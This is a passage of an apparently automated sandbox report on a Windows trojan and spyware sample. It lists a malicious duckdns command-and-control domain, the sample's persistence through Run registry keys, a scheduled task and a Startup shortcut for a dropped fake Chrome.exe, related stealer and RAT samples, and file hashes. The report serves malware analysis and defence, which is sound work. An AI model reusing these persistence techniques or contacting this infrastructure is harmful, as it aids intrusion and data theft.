                                                                                                        http://tempuri.org/Endpoint/CheckConnectTM2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/pscore68powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/soap/actor/nextM2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              208.95.112.1
                                                                                                              		ip-api.comUnited States
                                                                                                              		53334TUT-ASUSfalse
                                                                                                              192.169.69.26
                                                                                                              		duclog23.duckdns.orgUnited States
                                                                                                              		23033WOWUStrue

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1571409
                                                                                                              Start date and time:2024-12-09 11:03:55 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 8m 2s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:33
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:f5ATZ1i5CU.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@27/26@3/2
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 36.4%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 150
                                                                                                              • Number of non-executed functions: 10
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 23.193.114.26, 23.193.114.11, 52.165.164.15
                                                                                                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 5512 because it is empty
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 7476 because it is empty
                                                                                                              • Execution Graph export aborted for target Chrome.exe, PID 8048 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1452 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2312 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4456 because it is empty
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 8144 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • VT rate limit hit for: f5ATZ1i5CU.exe

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              05:04:47API Interceptor93x Sleep call for process: powershell.exe modified
                                                                                                              05:06:05API Interceptor45x Sleep call for process: Metin.exe modified
                                                                                                              11:06:06Task SchedulerRun new task: Chrome path: C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                              11:06:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                              11:06:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                              11:06:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              208.95.112.1R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                              spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                              • ip-api.com/line?fields=query,country
                                                                                                              xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                              • ip-api.com/json
                                                                                                              ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                                              • yuya0415.duckdns.org:1928/Vre
                                                                                                              confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • servidorarquivos.duckdns.org/e/e
                                                                                                              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                                                              • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                                                              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                                                              • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                                                              http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                                                                              • yvtplhuqem.duckdns.org/ja/
                                                                                                              http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                                                              • fqqqffcydg.duckdns.org/en/
                                                                                                              http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                                                              • yugdzvsqnf.duckdns.org/en/
                                                                                                              &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                                                                              • servidorarquivos.duckdns.org/e/e
                                                                                                              transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              • servidorarquivos.duckdns.org/e/e
                                                                                                              http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • www.secure-0fflce-o365.duckdns.org/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              ip-api.comR55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 208.95.112.1
                                                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                              • 208.95.112.1
                                                                                                              spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              duclog23.duckdns.orgP7UN3WhDhK.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                              • 154.216.20.204
                                                                                                              bg.microsoft.map.fastly.nethttps://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.210.172
                                                                                                              NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.214.172
                                                                                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                              • 199.232.210.172
                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 199.232.210.172
                                                                                                              file.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 199.232.210.172
                                                                                                              file.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 199.232.210.172
                                                                                                              file.exeGet hashmaliciousAveMaria, StormKitty, VenomRATBrowse
                                                                                                              • 199.232.210.172
                                                                                                              Q6OOwHYZzH.exeGet hashmaliciousDCRatBrowse
                                                                                                              • 199.232.210.172
                                                                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                              • 199.232.214.172
                                                                                                              List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 199.232.214.172

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              WOWUSP0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                                                              • 192.169.69.26
                                                                                                              173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                              • 192.169.69.26
                                                                                                              173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                              • 192.169.69.26
                                                                                                              17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                              • 192.169.69.26
                                                                                                              17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                              • 192.169.69.26
                                                                                                              17334792691d3587abc182d697c2a82dd4ad88afaea9fc5290ea9e42c7eec649b5ab319fda603.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                              • 192.169.69.26
                                                                                                              mgtOKjHZ1s.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              clfCnDEDd1.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              H1WNju5cCI.dllGet hashmaliciousRemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              tLC32F63bR.dllGet hashmaliciousRemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              TUT-ASUSR55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 208.95.112.1
                                                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                              • 208.95.112.1
                                                                                                              spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                              • 208.95.112.1
                                                                                                              BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                              • 208.95.112.1
                                                                                                              file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 208.95.112.1

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\user\AppData\Roaming\M2.exeP7UN3WhDhK.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                                C:\Users\user\AppData\Roaming\Chrome.exeP7UN3WhDhK.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Chrome.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):654
                                                                                                                  Entropy (8bit):5.380476433908377
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k0xn3ek.amf.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktbwd4q.4jq.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1x0stnic.mzk.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1y2bsoc0.oxx.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ogslxj1.xos.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aoxj2dvt.fn0.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b15j4e3o.ng3.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evwygwp4.xs2.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqrmomki.skr.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hsq31iiu.33a.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbsyvx5f.4rs.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtppn12k.moc.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
